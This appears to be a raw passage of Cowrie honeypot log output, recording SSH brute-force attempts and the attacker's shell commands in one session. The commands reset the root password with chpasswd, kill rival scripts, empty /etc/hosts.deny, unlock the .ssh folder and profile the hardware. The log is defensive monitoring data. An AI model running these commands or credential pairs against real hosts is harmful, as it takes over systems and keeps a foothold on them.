4-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T12:53:18.470781Z","src_ip":"212.227.125.160","session":"7383544b6955"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:53:18.682870Z","src_ip":"212.227.235.229","session":"df5ff5e5de08"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:19.933576Z","src_ip":"212.227.235.229","session":"df5ff5e5de08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56876,"dst_ip":"1.2.3.4","dst_port":22,"session":"9235185c3522","protocol":"ssh","message":"New connection: 212.227.235.229:56876 (1.2.3.4:22) [session: 9235185c3522]","sensor":"my-vps","timestamp":"2025-08-26T12:53:20.193314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:53:20.194745Z","src_ip":"212.227.235.229","session":"9235185c3522"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:26.260472Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T12:53:26.261133Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:26.308485Z","src_ip":"212.227.125.160","session":"7383544b6955"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:26.517958Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:27.047618Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"echo \"root:jgE4MTs3GPWj\"|chpasswd|bash","message":"CMD: echo \"root:jgE4MTs3GPWj\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T12:53:27.048327Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/20568fa455af4484582c603444e53351ca9cbc67512d84ea2ee36f7b1244efd7","size":21,"shasum":"20568fa455af4484582c603444e53351ca9cbc67512d84ea2ee36f7b1244efd7","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/20568fa455af4484582c603444e53351ca9cbc67512d84ea2ee36f7b1244efd7 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:27.305172Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:27.885196Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T12:53:27.886063Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T12:53:28.145576Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:28.146524Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:28.676246Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T12:53:28.677043Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:28.933987Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:29.538088Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T12:53:29.538982Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:29.796304Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:30.848529Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T12:53:30.849355Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T12:53:30.850083Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:31.107371Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:31.637873Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T12:53:31.638690Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:31.895015Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:32.497358Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T12:53:32.498022Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:32.754604Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:33.291261Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T12:53:33.292074Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:33.548974Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:34.156457Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T12:53:34.157359Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:34.415380Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:34.982689Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T12:53:34.983468Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:35.239970Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:35.770630Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T12:53:35.771640Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:36.027781Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:36.635026Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T12:53:36.635694Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:36.891766Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:37.428063Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T12:53:37.428860Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:37.685654Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:53:37.855906Z","src_ip":"212.227.235.229","session":"9235185c3522"}
{"eventid":"cowrie.session.closed","duration":"17.7","message":"Connection lost after 17.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:37.857713Z","src_ip":"212.227.235.229","session":"9235185c3522"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:38.286441Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T12:53:38.287154Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:38.543722Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:39.142334Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T12:53:39.143045Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:39.400667Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.closed","duration":"25.7","message":"Connection lost after 25.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:39.401857Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59932,"dst_ip":"1.2.3.4","dst_port":22,"session":"46574ee22495","protocol":"ssh","message":"New connection: 212.227.125.160:59932 (1.2.3.4:22) [session: 46574ee22495]","sensor":"my-vps","timestamp":"2025-08-26T12:53:53.792428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:53:53.793492Z","src_ip":"212.227.125.160","session":"46574ee22495"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:53:53.844037Z","src_ip":"212.227.125.160","session":"46574ee22495"}
{"eventid":"cowrie.login.failed","username":"ethereum","password":"ethereum","message":"login attempt [ethereum/ethereum] failed","sensor":"my-vps","timestamp":"2025-08-26T12:53:53.997489Z","src_ip":"212.227.125.160","session":"46574ee22495"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:55.051034Z","src_ip":"212.227.125.160","session":"46574ee22495"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51520,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44432899c12","protocol":"ssh","message":"New connection: 212.227.235.229:51520 (1.2.3.4:22) [session: b44432899c12]","sensor":"my-vps","timestamp":"2025-08-26T12:54:07.816721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:07.817655Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:08.063513Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.login.success","username":"root","password":"galaxy123","message":"login attempt [root/galaxy123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:54:09.097635Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.session.connect","src_ip":"72.89.145.142","src_port":53309,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8757e12d4cf","protocol":"telnet","message":"New connection: 72.89.145.142:53309 (1.2.3.4:23) [session: f8757e12d4cf]","sensor":"my-vps","timestamp":"2025-08-26T12:54:09.438626Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:09.609575Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:54:09.610265Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:54:09.611316Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:09.858769Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:10.462120Z","src_ip":"212.227.235.229","session":"b44432899c12"}
